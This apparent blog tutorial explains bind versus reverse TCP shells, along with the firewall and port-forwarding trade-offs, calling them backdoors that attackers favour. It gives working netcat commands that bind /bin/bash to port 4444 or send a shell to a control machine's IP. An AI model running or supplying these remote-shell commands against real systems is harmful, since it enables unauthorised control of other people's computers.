When I was learning this, I was disappointed with internet guides for setting up remote access, aka backdoor to a computer so here’s my contribution. Also, it’s important for security and privacy concerned people to understand this because these methods are often used maliciously to gain control over target computer.
In this article, I’m going to cover theory and practice behind binding TCP shells and reverse TCP shells. After that I will briefly touch upon their advanced versions – secure shells (SSH) and reverse secure shells.
Transmission Control Protocol (TCP) is a way to transfer data from one IP address to another. It’s used to transfer the command to the remote computer as well as the command output back to the command and control computer. In TCP connections, one side has to listen for a connection and the other side has to connect.
There are 2 ways to get a shell on remote machine:
- Remote machine listens for a connection. There has to be a process on the remote machine that waits for a connection and executes a shell once the connection is established.
- Remote machine connects to us. This one goes the other way around – local command and control machine has to listen for a connection and remote machine has to ‘send’ a shell to the listener.
Which one is better? Of course, it depends on the circumstances, otherwise one wouldn’t be mentioned. Each paragraph explains corresponding row in the table below.
At a first glance, option #1 seems superior because we can connect to remote computer anytime, instantly. When using reverse shell, persistent backdoors try to connect to the control computer periodically, so we usually have to wait.
By default, firewall blocks all connections to the machine. To allow connections to the listener process, firewall must open that port. Firewall only works for incoming connection, it has no restrictions on outgoing connections so by choosing option #1 or option #2, you’re also choosing which computer’s firewall you need to configure. This is why hackers prefer reverse shells – it’s easier to configure their than victim’s firewall.
When using TCP connection, each side’s router assigns a unique port to a specific computer in local area network. That’s how the router knows which packet should be sent to what computer in LAN. If we try to connect to our listener on remote machine (option #1) without configuring the router to forward our connection to the exact computer and exact process, the router will refuse connection because it doesn’t know where to send the packet. By choosing option #1 or option #2, you’re also choosing which router needs to be configured to port forward the connection. Obviously, hackers prefer to configure their router, rather than their victim’s.
Hopefully, you can answer the question yourself after reading this. Here’s the summary:
|Option #1 – Bind TCP shell to a port||Option #2 – Reverse TCP shell|
|Firewall||Must be configured or turned off on remote machine||Must be configured or turned off on control machine|
|Port Forwarding||Must be configured on remote machine’s router||Must be configured on local machine’s router|
If you don’t know where is your computer going to be, reverse shell is the way to go because you can always configure the firewall and port forwarding on your location. If you can configure the firewall and port forwarding on the remote side beforehand, you might want to enjoy the instant access.
I’m going to use netcat for demonstration because it’s available for Linux (featured here), Windows and Mac computers. It’s also the most simple and straightforward way to go. If you need to execute either of these without netcat, you can use Metasploit to generate a program for desired system.
Option #1 – Normal Shell
We need to bind a shell to a port and wait for a connection. Executing this on remote machine will do it:
nc -l -p 4444 -e /bin/bash
-l listen for a connection
-p specifies a port to listen on
-e run this upon connection
-k listen again after the connection is closed
-v produce verbose output – use this to debug
Now, we need to connect to that listener from out local machine. I’m connecting to my own computer for the demo purposes so I use 127.0.0.1 as IP address. You should replace it with target’s public IP address.
nc 127.0.0.1 4444
Option #2 – Reverse Shell
As previously discussed, we need to listen for a connection on our local, command and control computer:
nc –l –p 4444
Now, the remote computer has to send a shell by executing this (replace 127.0.0.1 with public IP that belongs to your command and control computer):
nc 127.0.0.1 4444 –c /bin/bash
-c specifies a program to start upon connecting
Keep in mind that these backdoors’ connection is in plain text and without any authentication. That’s why there are secure shell (SSH) and reverse secure shell that works the same way, but using encryption and password authentication with it.